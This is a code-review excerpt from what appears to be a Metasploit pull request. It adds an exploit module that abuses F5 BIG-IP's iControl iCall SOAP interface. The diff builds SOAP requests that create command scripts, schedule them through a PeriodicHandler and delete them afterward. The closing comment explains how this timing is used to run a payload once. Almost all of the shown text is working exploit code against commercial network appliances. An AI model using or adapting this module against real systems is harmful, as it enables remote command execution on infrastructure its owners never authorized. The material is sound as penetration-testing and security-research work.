modules/exploits/linux/http/f5_icall_cmd.rb

```diff
@@ -0,0 +1,256 @@
+  def build_xml
+    builder = Nokogiri::XML::Builder.new do |xml|
+      xml.Envelope do
+        xml = xml_add_namespaces(xml)
+        xml['soapenv'].Header
+        xml['soapenv'].Body do
+          yield xml
+        end
+      end
+    end
+    builder.to_xml
+  end
+
+  def xml_add_namespaces(xml)
+    ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
+    xml.doc.root.namespace = ns
+    xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
+    xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
+    xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
+    xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
+    xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
+    xml
+  end
+
+  def send_soap_request(pay)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    )
+    if res
+      return res
+    else
+      vprint_error('No response')
+    end
+    false
+  end
+
+  def create_script(name, cmd)
+    create_xml = build_xml do |xml|
+      xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item name
+        end
+        xml.definitions(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item cmd
+        end
+      end
+    end
+    send_soap_request(create_xml)
+  end
+
+  def delete_script(script_name)
+    delete_xml = build_xml do |xml|
+      xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item script_name
+        end
+      end
+    end
+    send_soap_request(delete_xml)
+  end
+
+  def script_exists(script_name)
+    exists_xml = build_xml do |xml|
+      xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
+    end
+    res = send_soap_request(exists_xml)
+    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
+  end
+
+  def create_handler(handler_name, script_name, interval)
+    handler_xml = build_xml do |xml|
+      xml['per'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.handlers(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item handler_name
+        end
+        xml.scripts(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item script_name
+        end
+        xml.intervals(LONG_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item interval
```

Comment:
Yes, I've used a PeriodicHandler in my original exploit, but there are other types, that one just looked like the easier to use, and I couldn't find any "just-run-once" type of thing. I thought the idea was, as the name suggests, to run every certain interval, so the original strategy in the exploit was, set a reasonable interval, run the payload, and delete it before it runs again. I didn't try very long intervals, it seems from what you're seeing that maybe it's more complicated than that. Or maybe just buggy?